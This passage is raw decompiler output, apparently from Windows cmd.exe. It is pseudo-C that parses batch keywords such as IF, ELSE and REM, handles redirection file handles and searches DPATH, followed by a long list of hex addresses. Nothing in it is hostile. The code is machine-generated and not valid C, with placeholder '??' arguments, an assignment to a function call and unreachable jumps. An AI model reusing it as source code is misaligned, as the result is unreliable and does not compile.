								__edx = 0x2c;
								__eax = E0015DCE1(__ebx, __edx, __edi);
								__eflags = __al;
								if(__al != 0) {
									__esi[0x1c] = __esi[0x1c] & 0x00000000;
									 *__esi = 0x3c;
									goto L47;
								} else {
									__edi = 0;
									__eflags =  *0x193cc9 - __al;
									if( *0x193cc9 == __al) {
										L40:
										__edx = 0;
										__ecx = 0;
										__eflags = 0;
										__eax = E0015F300(__eax, 0, 0, 0);
									} else {
										__imp___wcsicmp(L"/I");
										__ecx = 0x18faa0;
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											__edi = 0;
											__edi = 1;
										} else {
											goto L40;
										}
									}
									__ecx = 0;
									__eax = E0015CDA2(0);
									__esi[0x1e] = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __edi;
										if(__edi != 0) {
											__eflags =  *__eax - 0x38;
											if( *__eax == 0x38) {
												__eax = __eax[0x1e];
											}
											__eax[0x20] = 2;
										}
									}
									__ecx = 0x2c;
									__eax = E0015DC74(__ebx, __ecx);
									__esi[0x20] = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E001782EB(__ecx);
									}
									__eax = E0015EEC8();
									__eflags = __eax;
									if(__eax == 0) {
										L47:
										_pop(__edi);
										__eax = __esi;
										_pop(__esi);
										_pop(__ecx);
										return __esi;
									} else {
										__ecx = 0;
										__eax = E0015F030(0);
										__edi = 0x18faa0;
										__imp___wcsicmp(L"ELSE");
										_pop(__ecx);
										__ecx = 0x18faa0;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *0x18fa8c;
											__ecx =  *0x18fa8c +  *0x18fa8c;
											__eax = E001600B0(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E00179287(__ecx);
												__imp__longjmp(0x18b8b8, 1);
												asm("int3");
												while(1) {
													L165:
													__eax = 0;
													__edx[__ecx] = __ax;
													while(1) {
														__eax = __esi[0xa];
														__esi = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__ecx = __esi[2];
														__edi = __ecx;
														__edx =  &(__edi[1]);
														do {
															__ax =  *__edi;
															__edi =  &(__edi[1]);
															__eflags = __ax - __bx;
														} while (__ax != __bx);
														__edi = __edi - __edx;
														__edi = __edi >> 1;
														__eax = E001622C0(__ebx, __ecx);
														__ecx = __esi[2];
														__edx =  &(__edi[0]);
														__eax = E00161040(__esi[2], __edx, __eax);
														__eflags = __esi[4] - __ebx;
														if(__esi[4] == __ebx) {
															__edx = __esi[2];
															__ecx = __edx;
															__edi =  &(__ecx[1]);
															do {
																__ax =  *__ecx;
																__ecx =  &(__ecx[1]);
																__eflags = __ax - __bx;
															} while (__ax != __bx);
															__ecx = __ecx - __edi;
															__ecx = __ecx >> 1;
															__ecx = __ecx - 1;
															__eflags = __ecx - 1;
															if(__ecx > 1) {
																__eflags = __edx[__ecx] - 0x3a;
																if(__edx[__ecx] == 0x3a) {
																	goto L165;
																}
															}
														}
													}
													__edi = _v552;
													__esi = _v548;
													__eflags = __esi - 3;
													if(__esi == 3) {
														__eax =  *0x193cd4;
														_v552 = __eax;
														goto L67;
													} else {
														__ecx = 0x10;
														__eax = E001600B0(__ecx);
														_v552 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															L86:
															__ebx = 0;
															__ebx = 1;
														} else {
															__ecx =  *0x193cd4;
															__eax[6] =  *0x193cd4;
															 *0x193cd4 = __eax;
															__eax[4] = __edi;
															 *__eax = __esi;
															L67:
															__edi = __edi[0x1a];
															__eflags = __edi;
															if(__edi != 0) {
																__esi = __esi | 0xffffffff;
																__eflags = __esi;
																do {
																	__eflags = __edi[4] - __ebx;
																	if(__edi[4] != __ebx) {
																		goto L82;
																	} else {
																		__imp___get_osfhandle( *__edi);
																		_pop(__ecx);
																		__eflags = __eax - __esi;
																		if(__eax == __esi) {
																			L170:
																			__edi[4] = __esi;
																			goto L75;
																		} else {
																			__imp___get_osfhandle( *__edi);
																			_pop(__ecx);
																			__eflags = __eax - 0xfffffffe;
																			if(__eax == 0xfffffffe) {
																				goto L170;
																			} else {
																				__ecx =  *__edi;
																				__eax = E00160178(__eax);
																				__eflags = __eax;
																				if(__eax == 0) {
																					__ecx =  *__edi;
																					__eax = E00179953(__eax,  *__edi);
																					__eflags = __eax;
																					if(__eax != 0) {
																						goto L73;
																					} else {
																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
																						_pop(__ecx);
																						__eax = SetFilePointer(__eax, ??, ??, ??);
																						__eflags = __eax - __esi;
																						if(__eax != __esi) {
																							goto L73;
																						} else {
																							__esi = 0x193d00;
																							__eax = E0016274C(0x193d00, 0x104, L"%d",  *__edi);
																							_push(0x193d00);
																							_push(1);
																							_push(0x40002721);
																							goto L182;
																						}
																					}
																				} else {
																					L73:
																					__ecx =  *__edi;
																					__eax = E0015DBCE(__eax,  *__edi);
																					__edi[4] = __eax;
																					__eflags = __eax - __esi;
																					if(__eax == __esi) {
																						__esi = 0x193d00;
																						__eax = E0016274C(0x193d00, 0x104, L"%d",  *__edi);
																						_push(0x193d00);
																						_push(1);
																						_push(0x2344);
																						L182:
																						__eax = E0015C5A2(__ecx);
																						__esp = __esp + 0x1c;
																						__edi[4] = __ebx;
																						__eax = E0015D937();
																						goto L86;
																					} else {
																						__ecx =  *__edi;
																						__eax = E0015DB92( *__edi);
																						L75:
																						__ecx = __edi[2];
																						__eflags =  *__ecx - 0x26;
																						if( *__ecx == 0x26) {
																							__eax = 0;
																							__ecx[2] = __ax;
																							__eax = __edi[2];
																							__edx =  *__edi;
																							__ecx = __eax[1] & 0x0000ffff;
																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
																							__eax = E0015DBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
																							__eflags = __eax - __esi;
																							if(__eax != __esi) {
																								goto L82;
																							} else {
																								goto L183;
																							}
																						} else {
																							__eflags = __edi[8] - 0x3c;
																							_push(__ecx);
																							if(__edi[8] == 0x3c) {
																								__edx = 0x8000;
																								__eax = E0015D120(__ecx, 0x8000);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax != __esi) {
																									goto L79;
																								} else {
																									__ecx = L"DPATH";
																									__eax = E00163320(L"DPATH");
																									__eflags = __eax;
																									if(__eax == 0) {
																										goto L184;
																									} else {
																										__ecx = _v24;
																										__eflags = __ecx;
																										if(__ecx == 0) {
																											__ecx =  &_v544;
																										}
																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
																										__eflags = __eax;
																										if(__eax == 0) {
																											goto L184;
																										} else {
																											__ecx = _v24;
																											__eflags = __ecx;
																											if(__ecx == 0) {
																												__ecx =  &_v544;
																											}
																											_push(__ecx);
																											__edx = 0x8000;
																											goto L78;
																										}
																									}
																								}
																							} else {
																								__edi[6] =  ~(__edi[6]);
																								asm("sbb edx, edx");
																								__edx =  ~(__edi[6]) & 0xfffffe09;
																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
																								__eflags = __edx;
																								L78:
																								__eax = E0015D120(__ecx, __edx);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax == __esi) {
																									L184:
																									__eax = E0015D937();
																									__ecx =  *0x193cf0;
																									__eax = E0017985A( *0x193cf0);
																									goto L86;
																								} else {
																									L79:
																									__eflags = __eax -  *__edi;
																									if(__eax !=  *__edi) {
																										__edx =  *__edi;
																										__ecx = __eax;
																										__eax = E0015DBFC(__eax,  *__edi);
																										__ecx = _v548;
																										__esi = __eax;
																										__eax = E0015DB92(_v548);
																										__eflags = __esi - 0xffffffff;
																										if(__esi == 0xffffffff) {
																											L183:
																											__eax = E0015D937();
																											__esi = 0x193d00;
																											E0016274C(0x193d00, 0x104, L"%d",  *__edi) = E0015C5A2(__ecx, 0x2344, 1, 0x193d00);
																											goto L86;
																										} else {
																											__eax =  *__edi;
																											__esi = __esi | 0xffffffff;
																											goto L80;
																										}
																									} else {
																										L80:
																										__eflags = __eax - __esi;
																										if(__eax == __esi) {
																											goto L184;
																										} else {
																											__ecx = _v552;
																											_v552[2] = __eax;
																											goto L82;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L83;
																	L82:
																	__eax = __edi[0xa];
																	__edi = __eax;
																	__eflags = __eax;
																} while (__eax != 0);
															}
														}
													}
													L83:
													__imp__??_V@YAXPAX@Z(_v24);
													_pop(__ecx);
													__ecx = _v4;
													__eax = __ebx;
													_pop(__edi);
													_pop(__esi);
													__ecx = _v4 ^ __ebp;
													__eflags = __ecx;
													_pop(__ebx);
													__eax = E00166FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
													goto L218;
												}
											} else {
												__edx =  *0x18fa8c;
												__ecx = __eax;
												__esi[0x22] = __eax;
												__eax = E00161040(__eax,  *0x18fa8c, 0x18faa0);
												__ecx = 0x2c;
												__eax = E0015DC74(__ebx, __ecx);
												__esi[0x24] = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													__eax = E001782EB(__ecx);
												}
												goto L47;
											}
										} else {
											__edx = 0;
											__ecx = 0;
											__eflags = 0;
											__eax = E0015F300(__eax, 0, 0, 0);
											goto L47;
										}
									}
								}
							} else {
								__imp___wcsicmp(L"IF/?", 0x18faa0);
								__esp = __esp + 8;
								__eflags = __eax;
								if(__eax == 0) {
									goto L148;
								} else {
									__imp___wcsicmp(L"REM", 0x18faa0);
									__esp = __esp + 8;
									__eflags = __eax;
									if(__eax == 0) {
										L138:
										_pop(__esi);
										__edi = 0;
										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
										_pop(__ecx);
										__ecx = 0x18faa0;
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__edi = 0;
											 *0x18faa6 = __ax;
											__edi = 1;
										}
										__ecx = 0x2d;
										__esi = E0015E9A0(__ecx, __eflags);
										__eflags = __edi;
										if(__edi != 0) {
											__eax = 0x2f;
											 *0x18faa0 = __ax;
											__eax = 0x3f;
											 *0x18faa2 = __ax;
											__eax = 0;
											 *0x18faa4 = __ax;
										} else {
											__ecx = 0;
											__eflags = 0;
											__eax = E0015F030(0);
										}
										__edx = 0x2d;
										__eax = E0015DCE1(__ebx, __edx, __edi);
										__eflags = __al;
										if(__al != 0) {
											__esi[0x1c] = __esi[0x1c] & 0x00000000;
											 *__esi = 0x3c;
											goto L95;
										} else {
											__edx = 0;
											__ecx = 0;
											__eax = E0015F300(__eax, 0, 0, 0);
											__eax = E0015EEC8();
											__eflags = __eax;
											if(__eax == 0) {
												L95:
												_pop(__edi);
												__eax = __esi;
												_pop(__esi);
												_pop(__ecx);
												return __esi;
											} else {
												__ecx = 0x20;
												__eax = E0015F030(__ecx);
												__eflags = __eax - 0x4000;
												if(__eax != 0x4000) {
													__edx = 0;
													__ecx = 0;
													__eax = E0015F300(__eax, 0, 0, 0);
													goto L95;
												} else {
													__eax =  *0x18fa8c;
													__ecx =  *0x18fa8c +  *0x18fa8c;
													__eax = E001600B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														__eax = E00179287(__ecx);
														__imp__longjmp(0x18b8b8, 1);
														asm("int3");
														__eflags = __esi;
														if(__esi != 0) {
															__eax = 0;
															 *__ebx = __ax;
														}
														_pop(__edi);
														_pop(__esi);
														__eax = __ebx;
														_pop(__ebx);
														return __ebx;
													} else {
														__edx =  *0x18fa8c;
														__ecx = __eax;
														__esi[0x1e] = __eax;
														__eax = E00161040(__eax,  *0x18fa8c, 0x18faa0);
														goto L95;
													}
												}
											}
										}
									} else {
										__imp___wcsicmp(L"REM/?", 0x18faa0);
										__esp = __esp + 8;
										__eflags = __eax;
										if(__eax == 0) {
											goto L138;
										} else {
											_pop(__esi);
											_push(__ebp);
											__ebp = __esp;
											__esp = __esp - 0x14;
											_push(__ebx);
											_push(__esi);
											__eax =  &_v16;
											_v16 = 0;
											_push(__edi);
											__ecx = 0;
											__eflags = 0;
											_v12 =  &_v16;
											__ebx = E0015E9A0(0, 0);
											_v20 = __ebx;
											while(1) {
												__eax = E0015EEC8();
												__eflags = __eax;
												if(__eax == 0) {
													break;
												}
												__ecx = 1;
												__eax = E0015F030(1);
												__eflags = __eax - 0x4000;
												if(__eax == 0x4000) {
													__ecx = __ebx[0x1e];
													__edi =  *0x18fa8c;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  &(__ecx[1]);
														do {
															__ax =  *__ecx;
															__ecx =  &(__ecx[1]);
															__eflags = __ax;
														} while (__ax != 0);
														__ecx = __ecx - __edx;
														__edi = __edi + __ecx;
													}
													__ecx = __edi + __edi;
													__esi = E001600B0(__ecx);
													_v8 = __esi;
													__eflags = __esi;
													if(__esi == 0) {
														__eax = E00179287(__ecx);
														__imp__longjmp(0x18b8b8, 1);
														asm("int3");
														__eflags =  *0x18fa90;
														if( *0x18fa90 != 0) {
															__eax = E001782EB(__ecx);
														}
														__eax = 0;
														__eflags = 0;
														__eflags =  *0x18fa88;
														 *0x17d5c8 = 0;
														if( *0x18fa88 != 0) {
															__edx = 0;
															__ecx = __esi;
															__eax = E00178121(__esi, 0);
														}
														__eax = __esi;
														_pop(__edi);
														_pop(__esi);
														_pop(__ebx);
														_pop(__ebp);
														return __eax;
													} else {
														__ecx = __ebx[0x1e];
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edi;
															__ecx = __esi;
															__eax = E00161040(__esi, __edi, __esi);
														}
														__eax = 0;
														__eflags = __edi;
														if(__edi == 0) {
															L195:
															__eax = 0x80070057;
														} else {
															__eflags = __edi - 0x7fffffff;
															if(__edi > 0x7fffffff) {
																goto L195;
															}
														}
														__eflags = __eax;
														if(__eax < 0) {
															L198:
															__edx = 0;
														} else {
															__eax = 0;
															__ecx = __edi;
															__edx = __esi;
															__eflags = __edi;
															if(__edi == 0) {
																L197:
																__eax = 0x80070057;
																goto L198;
															} else {
																while(1) {
																	__eflags =  *__edx - __ax;
																	if( *__edx == __ax) {
																		break;
																	}
																	__edx =  &(__edx[1]);
																	__ecx = __ecx - 1;
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		continue;
																	} else {
																		goto L197;
																	}
																	goto L114;
																}
																__eflags = __ecx;
																if(__ecx == 0) {
																	goto L197;
																} else {
																	__edx = __edi;
																	__edx = __edi - __ecx;
																	__eflags = __edx;
																}
															}
														}
														L114:
														__eflags = __eax;
														if(__eax >= 0) {
															__eax = _v8;
															__esi = __edi;
															__eax =  &(_v8[__edx]);
															__esi = __edi - __edx;
															__eflags = __esi;
															if(__esi == 0) {
																L120:
																__eax = __eax - 2;
															} else {
																__ecx = __esi;
																__edx =  &(__edx[0x3fffffff]);
																__ecx = __esi - __edi;
																__edi = 0x18faa0;
																__edx = __edx + __ecx;
																__edi = 0x18faa0 - __eax;
																__eflags = 0x18faa0;
																while(1) {
																	__eflags = __edx;
																	if(__edx == 0) {
																		break;
																	}
																	__ecx =  *(__edi + __eax) & 0x0000ffff;
																	__eflags = __cx;
																	if(__cx == 0) {
																		break;
																	} else {
																		 *__eax = __cx;
																		__edx = __edx - 1;
																		__eax =  &(__eax[1]);
																		__esi = __esi - 1;
																		__eflags = __esi;
																		if(__esi != 0) {
																			continue;
																		} else {
																			goto L120;
																		}
																	}
																	goto L122;
																}
																__eflags = __esi;
																if(__esi == 0) {
																	goto L120;
																}
															}
															L122:
															__esi = _v8;
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
														__ebx[0x1e] = __esi;
														continue;
													}
												} else {
													__esi = _v12;
													__ecx = __esi;
													__eax = E001602B0(__ebx, __esi, __edi, __esi);
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *__esi;
														do {
															_t77 =  &(__eax[0xa]); // 0x14
															__ebx = _t77;
															__eax =  *__ebx;
															_v12 = __ebx;
															__eflags = __eax;
														} while (__eax != 0);
														__ebx = _v20;
														continue;
													} else {
														__edx = 0;
														__ecx = 0;
														__eflags = 0;
														__eax = E0015F300(__eax, 0, 0, __eax);
														break;
													}
												}
												goto L218;
											}
											__eax = _v16;
											_pop(__edi);
											__ebx[0x1a] = _v16;
											__eax = __ebx;
											_pop(__esi);
											_pop(__ebx);
											__esp = __ebp;
											_pop(__ebp);
											return __ebx;
										}
									}
								}
							}
						}
					}
				}
				L218:
			}























                                  0x001604a0
                                  0x001604a0
                                  0x001604ab
                                  0x00160557
                                  0x0016055d
                                  0x00160561
                                  0x001605da
                                  0x001605de
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00160563
                                  0x00160563
                                  0x00160563
                                  0x0016056d
                                  0x0016056f
                                  0x00160571
                                  0x0016852b
                                  0x00168537
                                  0x0016853d
                                  0x0016853e
                                  0x00168541
                                  0x00168543
                                  0x00168546
                                  0x00168548
                                  0x00168548
                                  0x0016854a
                                  0x0016854a
                                  0x0016854c
                                  0x0016854e
                                  0x0016854e
                                  0x00168553
                                  0x00168553
                                  0x00168556
                                  0x0016855a
                                  0x00168560
                                  0x00168560
                                  0x0015480e
                                  0x00160577
                                  0x00160577
                                  0x0016057f
                                  0x001605e9
                                  0x001605ef
                                  0x00160581
                                  0x00160581
                                  0x00160590
                                  0x00160595
                                  0x0016059a
                                  0x0016059a
                                  0x001605a8
                                  0x001605aa
                                  0x001605af
                                  0x001605af
                                  0x001605b9
                                  0x001605bc
                                  0x001605bf
                                  0x001605d0
                                  0x001605d3
                                  0x001605c1
                                  0x001605c6
                                  0x001605cb
                                  0x001605ce
                                  0x001605e0
                                  0x001605e0
                                  0x001605e5
                                  0x001605e8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x001605ce
                                  0x001605bf
                                  0x00160571
                                  0x001604b1
                                  0x001604bb
                                  0x001604c1
                                  0x001604c4
                                  0x001604c6
                                  0x001605f3
                                  0x001605f3
                                  0x00159a34
                                  0x00159a36
                                  0x00159a3c
                                  0x00159a3d
                                  0x00159a3e
                                  0x00159a40
                                  0x00171093
                                  0x00171095
                                  0x00171097
                                  0x0017109d
                                  0x0017109d
                                  0x00159a48
                                  0x00159a49
                                  0x00159a58
                                  0x00159a5c
                                  0x00159a5d
                                  0x00159a5f
                                  0x001710a3
                                  0x001710ab
                                  0x001710ac
                                  0x001710b2
                                  0x001710b4
                                  0x00159a65
                                  0x00159a65
                                  0x00159a65
                                  0x00159a67
                                  0x00159a67
                                  0x00159a6e
                                  0x00159a6f
                                  0x00159a74
                                  0x00159a76
                                  0x001710bf
                                  0x001710c3
                                  0x00159a7c
                                  0x00159a7c
                                  0x00159a80
                                  0x00159a89
                                  0x00159a8a
                                  0x00159a8c
                                  0x00159a8e
                                  0x00159a8e
                                  0x00159a8f
                                  0x00159a99
                                  0x00159a9f
                                  0x00159aa0
                                  0x00159aa1
                                  0x00159aa3
                                  0x00000000
                                  0x00000000
                                  0x00159aa9
                                  0x00159ab3
                                  0x00159ab9
                                  0x00159aba
                                  0x00159abb
                                  0x00159abd
                                  0x00159c3b
                                  0x00159c19
                                  0x00159c19
                                  0x00159c1b
                                  0x00159a8f
                                  0x00159a99
                                  0x00159a9f
                                  0x00159aa0
                                  0x00159aa1
                                  0x00159aa3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00159aa3
                                  0x00000000
                                  0x00159a8f
                                  0x00159acd
                                  0x00159ad3
                                  0x00159ad4
                                  0x00159ad5
                                  0x00159ad7
                                  0x00159bb9
                                  0x00159bbd
                                  0x00159bbf
                                  0x00159bc4
                                  0x00159bcc
                                  0x00159bcd
                                  0x00159bd0
                                  0x00000000
                                  0x00159bd6
                                  0x00159bd8
                                  0x00159bd9
                                  0x00159bdc
                                  0x00000000
                                  0x00159be2
                                  0x00159be2
                                  0x00159be6
                                  0x00159c46
                                  0x00159c46
                                  0x00159be8
                                  0x00159bed
                                  0x00159bf4
                                  0x00159bf9
                                  0x00159bfb
                                  0x00000000
                                  0x00159c01
                                  0x00159c01
                                  0x00159c07
                                  0x00000000
                                  0x00159c07
                                  0x00159bfb
                                  0x00159bdc
                                  0x00000000
                                  0x00159add
                                  0x00159ae7
                                  0x00159aed
                                  0x00159aee
                                  0x00159aef
                                  0x00159af2
                                  0x00159af4
                                  0x001710d1
                                  0x001710d4
                                  0x001710d6
                                  0x001710db
                                  0x001710df
                                  0x001710e1
                                  0x001710e1
                                  0x001710e6
                                  0x001710ee
                                  0x001710ef
                                  0x001710f2
                                  0x00000000
                                  0x001710f8
                                  0x001710fa
                                  0x001710fb
                                  0x001710fe
                                  0x00000000
                                  0x00171104
                                  0x00171104
                                  0x00171109
                                  0x00171110
                                  0x00171115
                                  0x00171117
                                  0x00171127
                                  0x00171127
                                  0x00171132
                                  0x00000000
                                  0x00171119
                                  0x00171119
                                  0x0017111f
                                  0x00159c0a
                                  0x00159c0f
                                  0x00159c11
                                  0x00159c14
                                  0x00000000
                                  0x00159c14
                                  0x00171117
                                  0x001710fe
                                  0x00000000
                                  0x00159afa
                                  0x00159afa
                                  0x00159afc
                                  0x00159afe
                                  0x00159b01
                                  0x00159c25
                                  0x00159c28
                                  0x00159c2e
                                  0x00159c30
                                  0x00171138
                                  0x00171138
                                  0x0017113b
                                  0x00171141
                                  0x00171144
                                  0x0017114a
                                  0x0017114a
                                  0x00171144
                                  0x0017113b
                                  0x00159c30
                                  0x00159c28
                                  0x00159b01
                                  0x00159afc
                                  0x00159af4
                                  0x00159b09
                                  0x00000000
                                  0x00159c41
                                  0x00159c41
                                  0x00000000
                                  0x00159c41
                                  0x00159a8f
                                  0x00159b0a
                                  0x00159b0a
                                  0x00159b11
                                  0x00171154
                                  0x00171154
                                  0x00159b17
                                  0x00159b17
                                  0x00159b1f
                                  0x00159b25
                                  0x00159b26
                                  0x00159b28
                                  0x00000000
                                  0x00159b2e
                                  0x00159b2e
                                  0x00159b35
                                  0x00159b3a
                                  0x00159b3d
                                  0x00159b42
                                  0x00159b44
                                  0x00000000
                                  0x00159b4a
                                  0x00159b4a
                                  0x00159b51
                                  0x00000000
                                  0x00000000
                                  0x00159b51
                                  0x00159b44
                                  0x00159b28
                                  0x00159b57
                                  0x00159b5a
                                  0x00159b5f
                                  0x00159b60
                                  0x00159b63
                                  0x00159b64
                                  0x00159b69
                                  0x00159b6e
                                  0x00159b73
                                  0x00159b76
                                  0x00159b77
                                  0x00159b7a
                                  0x00159b7b
                                  0x00159b80
                                  0x00159b85
                                  0x00159b8a
                                  0x00159b8d
                                  0x00159b92
                                  0x00159b95
                                  0x00159b98
                                  0x00159b9b
                                  0x00159b9c
                                  0x00159ba3
                                  0x00159ba4
                                  0x00159ba9
                                  0x00159bac
                                  0x00159bae
                                  0x0017115e
                                  0x0017115e
                                  0x00159bae
                                  0x00159bb4
                                  0x00159bb5
                                  0x00159bb7
                                  0x00159bb8
                                  0x001604cc
                                  0x001604d6
                                  0x001604dc
                                  0x001604df
                                  0x001604e1
                                  0x00000000
                                  0x001604e7
                                  0x001604f1
                                  0x001604f7
                                  0x001604fa
                                  0x001604fc
                                  0x001605d4
                                  0x001605d4
                                  0x0015d812
                                  0x0015d814
                                  0x0015d81a
                                  0x0015d81b
                                  0x0015d81c
                                  0x0015d81e
                                  0x0016b9cb
                                  0x0016b9cd
                                  0x0016b9cf
                                  0x0016b9d5
                                  0x0016b9d5
                                  0x0015d826
                                  0x0015d82c
                                  0x0015d82e
                                  0x0015d830
                                  0x0016b9dd
                                  0x0016b9de
                                  0x0016b9e6
                                  0x0016b9e7
                                  0x0016b9ed
                                  0x0016b9ef
                                  0x0015d836
                                  0x0015d836
                                  0x0015d836
                                  0x0015d838
                                  0x0015d838
                                  0x0015d83f
                                  0x0015d840
                                  0x0015d845
                                  0x0015d847
                                  0x0016b9fa
                                  0x0016b9fe
                                  0x00000000
                                  0x0015d84d
                                  0x0015d84d
                                  0x0015d84f
                                  0x0015d855
                                  0x0015d871
                                  0x0015d873
                                  0x0015d875
                                  0x0015d875
                                  0x0015d877
                                  0x0015d857
                                  0x0015d861
                                  0x0015d867
                                  0x0015d868
                                  0x0015d869
                                  0x0015d86b
                                  0x0015d919
                                  0x0015d91b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015d86b
                                  0x0015d87c
                                  0x0015d87e
                                  0x0015d883
                                  0x0015d886
                                  0x0015d888
                                  0x0015d88a
                                  0x0015d88c
                                  0x0015d921
                                  0x0015d924
                                  0x0015d932
                                  0x0015d932
                                  0x0015d926
                                  0x0015d926
                                  0x0015d88c
                                  0x0015d894
                                  0x0015d895
                                  0x0015d89a
                                  0x0015d89d
                                  0x0015d89f
                                  0x0016ba09
                                  0x0016ba09
                                  0x0015d8a5
                                  0x0015d8aa
                                  0x0015d8ac
                                  0x0015d8d7
                                  0x0015d8d7
                                  0x0015d8d8
                                  0x0015d8da
                                  0x0015d8db
                                  0x0015d8dc
                                  0x0015d8ae
                                  0x0015d8ae
                                  0x0015d8b0
                                  0x0015d8b5
                                  0x0015d8c0
                                  0x0015d8c6
                                  0x0015d8c7
                                  0x0015d8c8
                                  0x0015d8ca
                                  0x0015d8dd
                                  0x0015d8e2
                                  0x0015d8e5
                                  0x0015d8ea
                                  0x0015d8ec
                                  0x0016ba13
                                  0x0016ba1f
                                  0x0016ba25
                                  0x0016ba26
                                  0x0016ba26
                                  0x0016ba26
                                  0x0016ba28
                                  0x0015da46
                                  0x0015da46
                                  0x0015da49
                                  0x0015da4b
                                  0x0015da4d
                                  0x00000000
                                  0x00000000
                                  0x0015d9f1
                                  0x0015d9f4
                                  0x0015d9f6
                                  0x0015d9f9
                                  0x0015d9f9
                                  0x0015d9fc
                                  0x0015d9ff
                                  0x0015d9ff
                                  0x0015da04
                                  0x0015da06
                                  0x0015da08
                                  0x0015da0d
                                  0x0015da10
                                  0x0015da14
                                  0x0015da19
                                  0x0015da1c
                                  0x0015da1e
                                  0x0015da21
                                  0x0015da23
                                  0x0015da26
                                  0x0015da26
                                  0x0015da29
                                  0x0015da2c
                                  0x0015da2c
                                  0x0015da31
                                  0x0015da33
                                  0x0015da35
                                  0x0015da36
                                  0x0015da39
                                  0x0015da3b
                                  0x0015da40
                                  0x00000000
                                  0x00000000
                                  0x0015da40
                                  0x0015da39
                                  0x0015da1c
                                  0x0015da4f
                                  0x0015da55
                                  0x0015da5b
                                  0x0015da5e
                                  0x0016ba31
                                  0x0016ba36
                                  0x00000000
                                  0x0015da64
                                  0x0015da66
                                  0x0015da67
                                  0x0015da6c
                                  0x0015da72
                                  0x0015da74
                                  0x0015db8d
                                  0x0015db8d
                                  0x0015db8f
                                  0x0015da7a
                                  0x0015da7a
                                  0x0015da80
                                  0x0015da83
                                  0x0015da88
                                  0x0015da8b
                                  0x0015da8d
                                  0x0015da8d
                                  0x0015da90
                                  0x0015da92
                                  0x0015da98
                                  0x0015da98
                                  0x0015da9b
                                  0x0015da9b
                                  0x0015da9e
                                  0x00000000
                                  0x0015daa4
                                  0x0015daa6
                                  0x0015daac
                                  0x0015daad
                                  0x0015daaf
                                  0x0016ba90
                                  0x0016ba90
                                  0x00000000
                                  0x0015dab5
                                  0x0015dab7
                                  0x0015dabd
                                  0x0015dabe
                                  0x0015dac1
                                  0x00000000
                                  0x0015dac7
                                  0x0015dac7
                                  0x0015dac9
                                  0x0015dace
                                  0x0015dad0
                                  0x0016ba41
                                  0x0016ba43
                                  0x0016ba48
                                  0x0016ba4a
                                  0x00000000
                                  0x0016ba50
                                  0x0016ba56
                                  0x0016ba5c
                                  0x0016ba5e
                                  0x0016ba64
                                  0x0016ba66
                                  0x00000000
                                  0x0016ba6c
                                  0x0016ba6e
                                  0x0016ba7e
                                  0x0016ba83
                                  0x0016ba84
                                  0x0016ba86
                                  0x00000000
                                  0x0016ba86
                                  0x0016ba66
                                  0x0015dad6
                                  0x0015dad6
                                  0x0015dad6
                                  0x0015dad8
                                  0x0015dadd
                                  0x0015dae0
                                  0x0015dae2
                                  0x0016bb26
                                  0x0016bb36
                                  0x0016bb3b
                                  0x0016bb3c
                                  0x0016bb3e
                                  0x0016bb43
                                  0x0016bb43
                                  0x0016bb48
                                  0x0016bb4b
                                  0x0016bb4e
                                  0x00000000
                                  0x0015dae8
                                  0x0015dae8
                                  0x0015daea
                                  0x0015daef
                                  0x0015daef
                                  0x0015daf2
                                  0x0015daf6
                                  0x0015db6d
                                  0x0015db6f
                                  0x0015db73
                                  0x0015db76
                                  0x0015db78
                                  0x0015db7c
                                  0x0015db7f
                                  0x0015db84
                                  0x0015db86
                                  0x00000000
                                  0x0015db88
                                  0x00000000
                                  0x0015db88
                                  0x0015daf8
                                  0x0015daf8
                                  0x0015dafd
                                  0x0015dafe
                                  0x0016ba98
                                  0x0016ba9d
                                  0x0016baa2
                                  0x0016baa8
                                  0x0016baaa
                                  0x00000000
                                  0x0016bab0
                                  0x0016bab0
                                  0x0016bab5
                                  0x0016baba
                                  0x0016babc
                                  0x00000000
                                  0x0016bac2
                                  0x0016bac2
                                  0x0016bac5
                                  0x0016bac7
                                  0x0016bac9
                                  0x0016bac9
                                  0x0016bad9
                                  0x0016badf
                                  0x0016bae1
                                  0x00000000
                                  0x0016bae7
                                  0x0016bae7
                                  0x0016baea
                                  0x0016baec
                                  0x0016baee
                                  0x0016baee
                                  0x0016baf4
                                  0x0016baf5
                                  0x00000000
                                  0x0016baf5
                                  0x0016bae1
                                  0x0016babc
                                  0x0015db04
                                  0x0015db07
                                  0x0015db09
                                  0x0015db0b
                                  0x0015db11
                                  0x0015db11
                                  0x0015db17
                                  0x0015db17
                                  0x0015db1c
                                  0x0015db22
                                  0x0015db24
                                  0x0016bb89
                                  0x0016bb89
                                  0x0016bb8e
                                  0x0016bb94
                                  0x00000000
                                  0x0015db2a
                                  0x0015db2a
                                  0x0015db2a
                                  0x0015db2c
